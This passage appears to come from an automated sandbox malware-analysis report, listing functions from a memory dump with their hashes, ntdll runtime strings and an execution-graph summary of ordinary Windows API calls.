                                  • Instruction Fuzzy Hash: 6E90023120180406D6007158481470B0005D7D2302F55C015A316C555DC725CA696672
                                  Function 018E2FA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1907aec8f329f703b97a03fff58166723e16f4b13055058f74ecb517e02f109a
                                  • Instruction ID: 21f98a9d9546e03e24835b7176840f75661157fae9026aebfdca1acc1e932245
                                  • Opcode Fuzzy Hash: 1907aec8f329f703b97a03fff58166723e16f4b13055058f74ecb517e02f109a
                                  • Instruction Fuzzy Hash: 8690023120180406D600715848087470005D7D2302F55C015A716C555EC765CAA96632
                                  Function 018E2FB0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dacf5e4242b6a46e395112dea53f4022459b5f98cc8e8cd2167be0a7db84d986
                                  • Instruction ID: b3e78a8ea0c623dd7e2052602772b269e6f384a59a76cf8333d5d362234fda07
                                  • Opcode Fuzzy Hash: dacf5e4242b6a46e395112dea53f4022459b5f98cc8e8cd2167be0a7db84d986
                                  • Instruction Fuzzy Hash: 44900221601400464640716888449064005FBE3311755C125A299C550DC659CA7D5766
                                  Function 018E2FE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0895e26cccae673e6884646a5febefd8f821c5dac5a02cc19ae5249e429e44ac
                                  • Instruction ID: b871d35c272699c6530af8d3fd943df9ff756ca06bb07c423ea3194d005bf55a
                                  • Opcode Fuzzy Hash: 0895e26cccae673e6884646a5febefd8f821c5dac5a02cc19ae5249e429e44ac
                                  • Instruction Fuzzy Hash: 16900221211C0046D70075684C14B070005D7D2303F55C119A215C554CCA15CA795622
                                  Function 018E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3119b091d6394799eab459d9a9c4b9ca38ba2f84239da03e23943622e17d59b
                                  • Instruction ID: b6d9cdc75c11681c0215dfc9a7ce43d82480ed0ce72ffc3fe78c4410d1ede8a1
                                  • Opcode Fuzzy Hash: d3119b091d6394799eab459d9a9c4b9ca38ba2f84239da03e23943622e17d59b
                                  • Instruction Fuzzy Hash: 4C90026134140446D60071584414B060005D7E3301F55C019E306C554DC719CE6A6227
                                  Function 018E2F60 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2b05d9bc1a3c420cf8386d603495b19f8addf20cd1472df4c8e630c25629ce0
                                  • Instruction ID: c6495ae448b46442f041409e3cee8d3545101849b6af17cfbafba6d28973e253
                                  • Opcode Fuzzy Hash: a2b05d9bc1a3c420cf8386d603495b19f8addf20cd1472df4c8e630c25629ce0
                                  • Instruction Fuzzy Hash: B490026121140046D604715844047060045D7E3301F55C016A315C554CC629CE795226
                                  Function 018E2E80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26c7ccdb748964aab55483d96e261feab396c5f23ae015a210665a86ef7567c6
                                  • Instruction ID: 28ae1c1f2a46101f36063fbb77d1f38c979718ee21aa32ea952e11d3c9c6f1e7
                                  • Opcode Fuzzy Hash: 26c7ccdb748964aab55483d96e261feab396c5f23ae015a210665a86ef7567c6
                                  • Instruction Fuzzy Hash: 9690022160140506D60171584404616000AD7D2341F95C026A302C555ECB25CBAAA232
                                  Function 018E2EA0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ccdef35ffecdb1fd3069509fd94853cdcb503f2aff7665f42c13c13ea5b20ed
                                  • Instruction ID: 77c07f78b990a51556965bbe4c46d45a39ed8231c2f901e069bcd819159bbfef
                                  • Opcode Fuzzy Hash: 3ccdef35ffecdb1fd3069509fd94853cdcb503f2aff7665f42c13c13ea5b20ed
                                  • Instruction Fuzzy Hash: 9F90027120140406D640715844047460005D7D2301F55C015A706C554EC759CFED6766
                                  Function 018E2EE0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e8704af9f8cc1ad4b330c09ae1941541ae365769687ab78dffe59fe460174dc
                                  • Instruction ID: de405e461e16dad9a34915b1a8024f21e368304756d11acfb0833ad6f23e0b3d
                                  • Opcode Fuzzy Hash: 6e8704af9f8cc1ad4b330c09ae1941541ae365769687ab78dffe59fe460174dc
                                  • Instruction Fuzzy Hash: 1590026120180407D640755848046070005D7D2302F55C015A306C555ECB29CE696236
                                  Function 018E2E30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d2435a7b33b5e17a04d87889bd3274902278045e3415db37894264e3a07ccc14
                                  • Instruction ID: 0667e1fbac33f00f394536eb6e5e6458f5e56a3276b2252eb2ecba619e1ebd76
                                  • Opcode Fuzzy Hash: d2435a7b33b5e17a04d87889bd3274902278045e3415db37894264e3a07ccc14
                                  • Instruction Fuzzy Hash: A590022130140406D602715844146060009D7D3345F95C016E342C555DC725CB6BA233
                                  Function 018E3090 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f484863cd6a907723b166729f490a8f3cd4ed0ec3ba1f74d91751bea487a7ce
                                  • Instruction ID: d81d3652c8bea915396475dc22d88553c7da7a9ac1be06524ecc6174ed881c74
                                  • Opcode Fuzzy Hash: 1f484863cd6a907723b166729f490a8f3cd4ed0ec3ba1f74d91751bea487a7ce
                                  • Instruction Fuzzy Hash: CD90022124140806D640715884147070006D7D2701F55C015A202C554DC716CB7D67B2
                                  Function 018E3010 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2a49911a48a6b540e3bb21374d4c3e1289ce65e7022685ce9339d05f88888c0
                                  • Instruction ID: deabbadbd59c1d28e6ce74513935a8a9f72346f77d56bc485d7c9fb685f0c10a
                                  • Opcode Fuzzy Hash: a2a49911a48a6b540e3bb21374d4c3e1289ce65e7022685ce9339d05f88888c0
                                  • Instruction Fuzzy Hash: 9690022120184446D64072584804B0F4105D7E3302F95C01DA615E554CCA15CA6D5722
                                  Function 018E39B0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef2aa4eb75e1c7f8fd76d81b9a6e9c3750d100e86cefba3ba0c3c748f230cf4f
                                  • Instruction ID: 5a1074a783e51d698113f6ce514341f14085b6d5935005e97a022722c4d68507
                                  • Opcode Fuzzy Hash: ef2aa4eb75e1c7f8fd76d81b9a6e9c3750d100e86cefba3ba0c3c748f230cf4f
                                  • Instruction Fuzzy Hash: 3690022124545106D650715C44046164005F7E2301F55C025A281C594DC655CA6D6322
                                  Function 018E3D10 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: daaed8ec473cc1a4670c4d54ddb94da8f3400a4b84600490361b64157219b09a
                                  • Instruction ID: d63228e8a5200ab9eb8a569c9f6951efbc8ef1fe6c07ffc1534dfcb8875b07bd
                                  • Opcode Fuzzy Hash: daaed8ec473cc1a4670c4d54ddb94da8f3400a4b84600490361b64157219b09a
                                  • Instruction Fuzzy Hash: 8E900231202401469A4072585804A4E4105D7E3302B95D419A201D554CCA14CA795322
                                  Function 018E3D70 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dca85e80566fb71116055a66c3a9a80213fcf52333344346f27500fa5f0fba15
                                  • Instruction ID: 67a5bf733985b23e9c5afb5ad3d7cbfe369ce356b1afce3cf80123cbf583f317
                                  • Opcode Fuzzy Hash: dca85e80566fb71116055a66c3a9a80213fcf52333344346f27500fa5f0fba15
                                  • Instruction Fuzzy Hash: 3A90023520140406DA10715858046460046D7D2301F55D415A242C558DC754CAB9A222
                                  Function 018E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: f21f465b1a5368b7652c6b218e7be056040d7ef3c0cf1aa6c0ceae07126be2a1
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Function 018E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 858176113a9b0c3bdd121e82410b4b048d6731121a4cfc41537e466a904eaacd
                                  • Instruction ID: 9ccf296ddc0278d7caada25690a020f6b1daa9a5803455b6b48cdfb9aef45b91
                                  • Opcode Fuzzy Hash: 858176113a9b0c3bdd121e82410b4b048d6731121a4cfc41537e466a904eaacd
                                  • Instruction Fuzzy Hash: B451F6B6A0415ABFCB11EBAC889497EFBFDBB493407148229F5A9D3645D334DF4087A0
                                  Function 01952410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: eb23e5a3b7cd7a43d3cd86671f7dafacbfb0b918af37e666624f76f21872f1c0
                                  • Instruction ID: f53559e278aaf800f335d90daeffe80733bb4b67ebe2e7cf9a6321d8f2ea7b5f
                                  • Opcode Fuzzy Hash: eb23e5a3b7cd7a43d3cd86671f7dafacbfb0b918af37e666624f76f21872f1c0
                                  • Instruction Fuzzy Hash: 28510875A00645EECF70DF6CC89097FBBFDEB48305B048869F99AE7642D6B4DA008760
                                  Function 018D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01914742
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019146FC
                                  • ExecuteOptions, xrefs: 019146A0
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01914787
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01914725
                                  • Execute=1, xrefs: 01914713
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01914655
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: d3d2e0c49e7e82629537dac92bd8ff3a42afc6ceb2a3c52de3005c9ac3b5999b
                                  • Instruction ID: 28675326be6aff16fbeeaa7f24bfe9b494c69dcf0aaa9d31c090642954e37454
                                  • Opcode Fuzzy Hash: d3d2e0c49e7e82629537dac92bd8ff3a42afc6ceb2a3c52de3005c9ac3b5999b
                                  • Instruction Fuzzy Hash: 7D51193160031E7AEF21EBA9EC89FA977B8EF19708F140499D609E7181EB709B41CF51
                                  Function 01976940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: 7e3d08c3732aec8906fa4b046b8dcc03be888991463a2fb8afbf3aed34fa2368
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: 0F021671508742AFE309DF18C894A6BBBE5EFD9700F14892DF9898B254DB31E905CB52
                                  Function 018EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 68c04f06da47faa090e12cadc26a40164b3c6c2c0947ad279e6050bb31d960a0
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: DA81E070E452598FEF298E6CC8997FEBBF1AF47360F18411AD861E7691C7308A40CB51
                                  Function 019520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: 1963e33253a984a7be52202b47f6d78ee425856cf9412fa4f3d9e2c22593d9aa
                                  • Instruction ID: 4be54179ae59a794bf68f7a20ee260beb93f55383c11191f8a6e3a00cf2852b7
                                  • Opcode Fuzzy Hash: 1963e33253a984a7be52202b47f6d78ee425856cf9412fa4f3d9e2c22593d9aa
                                  • Instruction Fuzzy Hash: 5821217AA00119ABDB51DF7DDC44AAF7BEDAF54654F44012AEE49E3201E7309A018BA1
                                  Function 018CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019102BD
                                  • RTL: Re-Waiting, xrefs: 0191031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019102E7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 60c7d93515814fbe59b2feaf11dc0dca938b738b0f8ed53c0f405004dfce4688
                                  • Instruction ID: c53510c3d020e59184744d0718d9afd85f8822975c99d2be14602828b6b3a54e
                                  • Opcode Fuzzy Hash: 60c7d93515814fbe59b2feaf11dc0dca938b738b0f8ed53c0f405004dfce4688
                                  • Instruction Fuzzy Hash: CDE1CE306047459FE725CF2CC884B2ABBE1BB85714F140A1DF6A9CB2D1D775DA85CB42
                                  Function 018DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Resource at %p, xrefs: 01917B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01917B7F
                                  • RTL: Re-Waiting, xrefs: 01917BAC
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: f451712a75d600787856c8a791ec2f6f429ef70a42280eeabd5485304560f217
                                  • Instruction ID: 0d6fcce33fe10006ad21dfc200463afce24f1c675a6c55546ba4958ba839db45
                                  • Opcode Fuzzy Hash: f451712a75d600787856c8a791ec2f6f429ef70a42280eeabd5485304560f217
                                  • Instruction Fuzzy Hash: F741E3313007079FDB25DE29C840B6AB7E5EF9A711F110A2DF95AD7280DB31E645CB91
                                  Function 018DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0191728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 019172A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01917294
                                  • RTL: Re-Waiting, xrefs: 019172C1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: bd7085361bc51ae2dcd7faa9b0bb15c41431e88e539b09bd4ed18eff24b2ac08
                                  • Instruction ID: 5ee761e6f802504b6e0eec760d586b5a9369edf832ee05e43891d573f2065749
                                  • Opcode Fuzzy Hash: bd7085361bc51ae2dcd7faa9b0bb15c41431e88e539b09bd4ed18eff24b2ac08
                                  • Instruction Fuzzy Hash: 4941023170030BABD725DE69CC81FA6B7A5FF96714F200A19F959EB240DB21E982C7D1
                                  Function 01952300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: ff668c705b5b7fe424d20d67e971779fbfb74d866c6ddb025239d99756abc07b
                                  • Instruction ID: e964f07a9b30c9d2d507142f5b49ab106895dfc1dcc7a3510f6a61d22d95352b
                                  • Opcode Fuzzy Hash: ff668c705b5b7fe424d20d67e971779fbfb74d866c6ddb025239d99756abc07b
                                  • Instruction Fuzzy Hash: 27317372A00219DFDB60DF2DDC40BAE77FCAB44A11F440599ED49E7201EB30AA488BA0
                                  Function 018E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 1a85958abcd0ad6a88490ebf8327277bb31706fcc1d87a48655afea2a7aeea4f
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: BB919071E0021A9BEB24DF6DC888ABEBBE5FF46720F14451AE955E72C4E7309B408791
                                  Function 018A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 780069e3bbc842ab045a057f0580cb86388502ea0c56d0b09de783311016cf43
                                  • Instruction ID: c7abfa3a1603851d0f85c2073ae9658a7a67e3eb8b0a3ed44850ce6f93b11cc0
                                  • Opcode Fuzzy Hash: 780069e3bbc842ab045a057f0580cb86388502ea0c56d0b09de783311016cf43
                                  • Instruction Fuzzy Hash: A8810C71D042699BDB36CB58CC44BEAB7B8AB48754F0045EAEA1DF7280D7709E84CF61

                                  Execution Graph

                                  Execution Coverage:9.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:93
                                  Total number of Limit Nodes:4
                                  execution_graph 19352 b94668 19353 b9467a 19352->19353 19354 b94686 19353->19354 19358 b94778 19353->19358 19363 b93e28 19354->19363 19356 b946a5 19359 b9479d 19358->19359 19367 b94888 19359->19367 19371 b94878 19359->19371 19364 b93e33 19363->19364 19379 b95c44 19364->19379 19366 b96ff0 19366->19356 19368 b948af 19367->19368 19369 b9498c 19368->19369 19375 b944b0 19368->19375 19373 b948af 19371->19373 19372 b9498c 19372->19372 19373->19372 19374 b944b0 CreateActCtxA 19373->19374 19374->19372 19376 b95918 CreateActCtxA 19375->19376 19378 b959db 19376->19378 19378->19378 19380 b95c4f 19379->19380 19383 b95c64 19380->19383 19382 b97095 19382->19366 19384 b95c6f 19383->19384 19387 b95c94 19384->19387 19386 b9717a 19386->19382 19388 b95c9f 19387->19388 19391 b95cc4 19388->19391 19390 b9726d 19390->19386 19392 b95ccf 19391->19392 19394 b9856b 19392->19394 19397 b9ac18 19392->19397 19393 b985a9 19393->19390 19394->19393 19401 b9cd17 19394->19401 19406 b9ac3f 19397->19406 19411 b9ac50 19397->19411 19398 b9ac2e 19398->19394 19402 b9cd39 19401->19402 19403 b9cd5d 19402->19403 19443 b9cec8 19402->19443 19447 b9ceb7 19402->19447 19403->19393 19407 b9ac50 19406->19407 19415 b9ad39 19407->19415 19423 b9ad48 19407->19423 19408 b9ac5f 19408->19398 19413 b9ad39 2 API calls 19411->19413 19414 b9ad48 2 API calls 19411->19414 19412 b9ac5f 19412->19398 19413->19412 19414->19412 19416 b9ad59 19415->19416 19417 b9ad7c 19415->19417 19416->19417 19431 b9afd1 19416->19431 19435 b9afe0 19416->19435 19417->19408 19418 b9ad74 19418->19417 19419 b9af80 GetModuleHandleW 19418->19419 19420 b9afad 19419->19420 19420->19408 19424 b9ad59 19423->19424 19425 b9ad7c 19423->19425 19424->19425 19429 b9afd1 LoadLibraryExW 19424->19429 19430 b9afe0 LoadLibraryExW 19424->19430 19425->19408 19426 b9ad74 19426->19425 19427 b9af80 GetModuleHandleW 19426->19427 19428 b9afad 19427->19428 19428->19408 19429->19426 19430->19426 19433 b9afe0 19431->19433 19432 b9b019 19432->19418 19433->19432 19439 b9a0d0 19433->19439 19436 b9aff4 19435->19436 19437 b9a0d0 LoadLibraryExW 19436->19437 19438 b9b019 19436->19438 19437->19438 19438->19418 19440 b9b1c0 LoadLibraryExW 19439->19440 19442 b9b239 19440->19442 19442->19432 19444 b9ced5 19443->19444 19445 